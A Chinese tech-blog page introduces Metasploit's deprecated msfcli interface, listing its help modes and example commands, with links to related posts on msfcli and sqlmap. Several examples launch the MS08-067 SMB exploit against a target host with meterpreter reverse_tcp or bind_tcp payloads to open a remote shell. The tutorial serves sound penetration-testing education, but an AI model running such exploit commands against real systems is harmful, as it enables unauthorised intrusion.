metasploit渗透测试框架的msfcli -h命令介绍

最新推荐文章于 2022-08-24 02:10:07 发布
最新推荐文章于 2022-08-24 02:10:07 发布
阅读量1.4k 收藏
点赞数 1
分类专栏: kali-linux渗透测试 文章标签: metasploit框架 msfcli命令
原文链接:https://blog.51cto.com/site/error?code=5
版权

msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号 被弃用了

root@xxoo:~# msfcli -h
Usage: /opt/metasploit/msf3/msfcli <exploit_name> <option=value> [mode]

Mode Description
—- ———–
(A)dvanced Show available advanced options for this module      #显示该模块的所有高级配置选项 (AC)tions Show available actions for this auxiliary module            #显示辅助模块的所有可用动作 (C)heck Run the check routine of the selected module            #运行选定模块的检查例程

(E)xecute Execute the selected module                    #运行选定的模块

(H)elp You’re looking at it baby!                      #帮助信息                    
(I)DS Evasion Show available ids evasion options for this module  #显示该模块的可用IDS逃逸选项(O)ptions Show available options for this module                        #显示所有配置选项

(P)ayloads Show available payloads for this module                #显示该模块适用的***载荷 (S)ummary Show information about this module                   #显示关于该模块详细信息

(T)argets Show available targets for this exploit module      #显示******模块的所有***目标类型

查看某一个exploit的options :

root@xxoo:~# msfcli windows/smb/ms08_067_netapi O

设置options 同时显示payloads的命令如下:

root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=127.0.0.1 P

设置好options,payloads然后执行exploit的命令如下:

root@xxoo:~# msfcli windows/smb/ms08_067_netapi RHOST=www.xx.com PAYLOAD=windows/meterpreter/reverse_tcp LHOST=xxoo E

root@xxoo:~# msfcli | grep exploit
仅列出******模块。

root@xxoo:~# msfcli | grep exploit/windows
仅列出与windows相关的******模块。

root@xxoo:~# msfcli exploit/windows/smb/ms08_067_netapi PAYLOAD=windows/meterpreter/bind_tcp LPORT=PORT RHOST=IP E
对IP发起ms08_067_netapi******,配置了bind_tcp***载荷,并绑定在PORT端口进行监听。
Ctrl精
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Kali学习 | 漏洞利用:4.3 控制Metasploit 命令行接口 MSFCLI
qq_43233085的博客
12-28 534
Kali学习 | 漏洞利用:4.3 控制Metasploit 命令行接口 MSFCLIMSFCLI 介绍MSFCLI 使用使用MSFCLI演示渗透攻击 MSFCLI 介绍 为了完成Metasploit的攻击任务,需要使用一个接口。MSFCLI刚好实现这个功能。 为了学习Metasploit 或测试/写一个新的渗透攻击,MSFCLI是一个很好的接口。 MSF命令行和MSF终端为Metasploit框...
Metasploit渗透测试指南完整版-pdf
07-23
Metasploit是一个免费的、可下载的框架,通过它可以很容易地获取、开发并对计算机软件漏洞实施攻击。它本身附带数百个已知软件漏洞的专业级漏洞攻击工具。当H.D. Moore在2003年发布Metasploit时,计算机安全状况也被...
Metasploit(三)--Msfcli命令
weixin_33701294的博客
08-27 262
原文:《metasploit the pentration tester’s guide》msfcli命令为方便metasploit框架和其他的shell交互而设计. 2015年6月8号被弃用了root@xxoo:~# msfcli -hUsage: /opt/metasploit/msf3/msfcli <exploit_name> <option=va...
Metasploit使用msfcli命令行接口编写shell脚本程序
m0_46161993的博客
07-01 1018
问题描述   使用msfcli命令行接口编写一个Shell脚本程序,实现用户只需输入目标Linux靶机IP地址作为参数,就可以使用usermap_script漏洞渗透攻击模块,获得靶机的远程Shell访问。 解决办法   由于2005年时便取消了msfcli,因此使用msfconsole -x来代替msfcli。   先提供脚本内容如下: #!/bin/bash #表示使用Bourne Again Shell的shell类型 echo "Please set remote host(RHOST) IP"
msfcli 不能使用,在新版metasploit不再有效
Smile in a sunny day
11-20 8577
原文地址:https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploit Hi, 大家好,      这个一月份,我们做了一份关于 Metasploit命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。      取代
第四期_Metasploit 基础(一)msfcliMetasploit Unleashed Simplified Chinese version(Metasploit官方文档教程中文版)》
Sno_WolF的博客
02-04 562
四、METASPLOIT 基础 在学习如何使用Metasploit时,您会发现有许多不同的界面可用于此黑客工具,每个界面都有自己的优点和缺点。因此,没有一个完美的界面可以与Metasploit控制台一起使用,尽管MSFConsole是访问大多数Metasploit命令的唯一受支持方式。但是,对所有 Metasploit 接口感到满意仍然是有益的。 下一个Metasploit Tutorial将概述各种接口,以及一些最佳利用每个接口的讨论。 1. MSFCLI a)什么是 MSFCLImsfcli 为框
Metasploit渗透测试指南_渗透测试_metasploit_
10-04
介绍Metasploit使用方法,进行各种各样的渗透测试
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf 渗透测试-后渗透阶段10.pdf 渗透测试-实验拓扑环境4.pdf 渗透测试-情报搜集5.pdf 渗透测试-社会工程学8.pdf 渗透测试...
Metasploit渗透测试指南 修订版
09-21
Metasploit渗透测试指南 修订版,是Metasploit框架渗透测试入门畅销近十年的口碑好书!!PDF扫描版,有详细书签!
msfcli: 未找到命令
gRpc的博客
08-24 331
msfcli msfconsole
metasploit之——msfcli 不能使用,在新版metasploit不再有效
冰河的专栏
11-22 1135
原文地址:https://community.rapid7.com/community/metasploit/blog/2015/07/10/msfcli-is-no-longer-available-in-metasploit Hi, 大家好,      这个一月份,我们做了一份关于 Metasploit命令行版本接口版本 Msfcli 的声明,今天我们要对它说再见了。      取代...
打发无聊的100个网站
热门推荐
博客转移到个人主站,请大家移步 http://www.soskp.com/
12-12 21万+
1,打发无聊时光的100个很经典的令人感叹为止网站,看看自己具有哪个大明星的脸型 http://www.play-analogia.com/cgi-bin/index/ <br />2,超有意思的Flash网站,虚拟办公 http://agencynet.com <br />3,亲自动手给美女画纹身 http://www.crustydemons.co.uk/UK/tattoo_parlour/index.html <br />4,输入文字就发出声音! http://www.putonghuaonline.
Python 获取动漫番剧 -XXOO
JueDream的博客
01-27 3万+
前言 没有什么好说的,就是想起来前些年失恋使劲刷番剧缓解自己糟糕的情绪。纪念下。 一、直接上代码 1.搜索入口 # 搜索动漫名称 列表 def get_video_list(name): # 开启代理 # proxy = {'http': 'http://127.0.0.1:8080', 'https': 'https://127.0.0.1:8080' } url = 'http://www.7666.tv/search.php?searchword=' + nam...
sqlmap用法
keepxp的博客
07-28 2万+
Sqlamp Usage https://github.com/sqlmapproject/sqlmap/wiki/Usage Usage: python sqlmap.py [options] Options: -h, --help Show basic help message and exit -hh Show ad
hello!everyone
www_xxoopapa_net的博客
08-15 4万+
moongate
Js跨域、父级窗口执行JS赋值、取值,更改元素
weixin_34309435的博客
12-02 3977
网站域名:   A:http://www.xxoo.com/a.html   B:http://www.aabb.com/b.html B网站嵌套与A网站(A的a中的Iframe指向B中的b)b要让父级a页面执行脚本  则有如下几种方式: 在A域名下网站新建a1.html页面 在B域名下b网页添加iframe 指向a1.html页面  路径为http://www.xxoo.com/a1....
经典网站
wzh1215的专栏
07-03 2万+
1,看看自己具有哪个大明星的脸型 http://www.play-analogia.com/cgi-bin/index/ 2,超有意思的Flash网站,虚拟办公 http://agencynet.com 3,亲自动手给美女画纹身 http://www.crustydemons.co.uk/UK/tattoo_parlour/index.html 4,输入文字就发出声音! http://
sqlmap命令详解
java_java_cl的博客
02-14 1498
cookie注入:sqlmap.py -u 注入点 --cookie "参数" --tables --level 2 POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sqlmap.py -u...
Metasploit 渗透测试框架的基本使用
最新发布
05-26
Metasploit 是一个常用的渗透测试框架,它可以帮助安全研究人员和渗透测试人员识别和利用漏洞,以便在测试过程中评估网络和系统的安全性。以下是 Metasploit 渗透测试框架的基本使用方法: 1. 安装 Metasploit:...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值